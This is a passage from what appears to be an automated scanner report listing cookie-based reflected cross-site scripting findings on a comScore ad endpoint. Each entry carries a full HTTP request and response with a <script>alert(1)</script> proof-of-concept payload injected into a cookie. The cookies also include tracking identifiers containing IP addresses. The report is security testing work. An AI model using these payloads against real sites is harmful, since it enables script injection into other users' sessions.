Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&78cd8<script>alert(1)</script>b32677a42c3; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:36 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224211', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&78cd8<script>alert(1)</script>b32677a42c3', "ar_p45555483": 'exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:0
...[SNIP]...

1.436. http://ar.voicefive.com/bmx3/broker.pli [ar_p97126803 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97126803 cookie is copied into the HTML document as plain text between tags. The payload 59d5b<script>alert(1)</script>38f87bac3a6 was submitted in the ar_p97126803 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=2108454&AR_C=4477047 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1309224217%2E202%2Cwait%2D%3E10000%2C; ar_p97126803=exp=1&initExp=Tue Jun 28 01:57:15 2011&recExp=Tue Jun 28 01:57:15 2011&prad=61657509&arc=41521544&59d5b<script>alert(1)</script>38f87bac3a6; BMX_3PC=1; ar_s_p97126803=1->1309226235; BMX_BR=pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309227823; ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 02:23:43 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 02:23:51 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=9&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 02:23:51 2011&prad=2108454&arc=4477047&; expires=Mon 26-Sep-2011 02:23:51 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 32010

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"2108454",Pid:"p84552060",Arc:"4477047",Location:COMS
...[SNIP]...
=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&', "ar_p97126803": 'exp=1&initExp=Tue Jun 28 01:57:15 2011&recExp=Tue Jun 28 01:57:15 2011&prad=61657509&arc=41521544&59d5b<script>alert(1)</script>38f87bac3a6', "ar_p85001580": 'exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recEx
...[SNIP]...

1.437. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload f297e<script>alert(1)</script>344d84827fa was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&f297e<script>alert(1)</script>344d84827fa; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:38 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
un 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&f297e<script>alert(1)</script>344d84827fa', "ar_p82806590": 'exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&', "BMX_G": 'method->
...[SNIP]...

1.438. http://ar.voicefive.com/bmx3/broker.pli [ar_p97464717 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97464717 cookie is copied into the HTML document as plain text between tags. The payload 49b5b<script>alert(1)</script>c195068243e was submitted in the ar_p97464717 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&49b5b<script>alert(1)</script>c195068243e; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:37 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
Ready.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&49b5b<script>alert(1)</script>c195068243e', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14
...[SNIP]...

1.439. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p98294060 cookie is copied into the HTML document as plain text between tags. The payload 407af<script>alert(1)</script>ec879221ea8 was submitted in the ar_p98294060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&407af<script>alert(1)</script>ec879221ea8; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p84552060=exp=2&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01:28:46 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; BMX_G=method->-1,ts->1309224495; BMX_3PC=1; UID=33da324b-72.246.30.136-1309224496; BMX_BR=pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224526

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:51:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=4&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01:51:56 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:51:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31911

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
Exp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&407af<script>alert(1)</script>ec879221ea8', "BMX_BR": 'pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224526', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=29663
...[SNIP]...

1.440. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p97126803 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p97126803 cookie is copied into the HTML document as plain text between tags. The payload 19826<script>alert(1)</script>41cc46641b7 was submitted in the ar_s_p97126803 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=2108454&AR_C=4477047 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1309224217%2E202%2Cwait%2D%3E10000%2C; ar_p97126803=exp=1&initExp=Tue Jun 28 01:57:15 2011&recExp=Tue Jun 28 01:57:15 2011&prad=61657509&arc=41521544&; BMX_3PC=1; ar_s_p97126803=1->130922623519826<script>alert(1)</script>41cc46641b7; BMX_BR=pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309227823; ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 02:23:43 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 02:23:52 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=9&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 02:23:52 2011&prad=2108454&arc=4477047&; expires=Mon 26-Sep-2011 02:23:52 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 32010

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"2108454",Pid:"p84552060",Arc:"4477047",Location:COMS
...[SNIP]...
